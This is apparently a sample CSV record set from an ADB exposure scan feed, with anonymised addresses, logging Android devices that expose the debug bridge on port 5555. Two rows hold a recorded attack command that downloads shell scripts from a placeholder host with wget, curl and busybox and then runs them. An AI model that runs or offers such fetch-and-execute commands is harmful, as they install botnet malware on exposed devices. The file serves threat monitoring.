"timestamp","protocol","src_ip","src_port","src_asn","src_geo","src_region","src_city","src_hostname","src_naics","src_sector","device_vendor","device_type","device_model","severity","dst_ip","dst_port","dst_asn","dst_geo","dst_region","dst_city","dst_hostname","dst_naics","dst_sector","public_source","infection","family","tag","application","version","event_id","vulnerability_enum","vulnerability_id","vulnerability_class","vulnerability_score","vulnerability_severity","vulnerability_version","threat_framework","threat_tactic_id","threat_technique_id","target_vendor","target_product","target_class","banner","commands","maxdata","system_type","opened"
"2010-02-10 00:00:00",tcp,192.168.0.1,60806,64512,ZZ,Region,City,node01.example.com,0,,,,,high,172.16.0.1,5555,65534,ZZ,Region,City,node01.example.net,0,,,adb-scan,,,adb,16777217,,,,,,,,,,,,,,"features=shell_v2,cmd,stat_v2,ls_v2,fixed_push_mkdir,apex,abb,fixed_push_symlink_timestamp,abb_exec,remount_shell,track_app,sendrecv_v2,sendrecv_v2_brotli,sendrecv_v2_lz4,sendrecv_v2_zstd,sendrecv_v2_dry_run_send,openscreen_mdns",,1048576,host,
"2010-02-10 00:00:01",tcp,192.168.0.2,38580,64512,ZZ,Region,City,node02.example.com,0,,,,,high,172.16.0.2,5555,65534,ZZ,Region,City,node02.example.net,0,,,adb-scan,,,adb,16777216,,,,,,,,,,,,,,"features=cmd,shell_v2",,262144,host,"shell:cd /data/local/tmp/;busybox wget http://192.168.0.4//w.sh; sh w.sh; curl http://192.168.0.4//c.sh; sh c.sh; wget http://192.168.0.4//wget.sh; sh wget.sh; curl http://192.168.0.4//wget.sh; sh wget.sh; busybox wget http://192.168.0.4//wget.sh; sh wget.sh; busybox curl http://192.168.0.4//wget.sh; sh wget.sh"
"2010-02-10 00:00:02",tcp,192.168.0.3,36790,64512,ZZ,Region,City,node03.example.com,0,,,,,high,172.16.0.3,5555,65534,ZZ,Region,City,node03.example.net,0,,,adb-scan,,,adb,16777216,,,,,,,,,,,,,,"features=cmd,shell_v2",,262144,host,"shell:cd /data/local/tmp/;busybox wget http://192.168.0.4//w.sh; sh w.sh; curl http://192.168.0.4/c.sh; sh c.sh; wget http://192.168.0.4//wget.sh; sh wget.sh; curl http://192.168.0.4//wget.sh; sh wget.sh; busybox wget http://192.168.0.4/wget.sh; sh wget.sh; busybox curl http://192.168.0.4//wget.sh; sh wget.sh"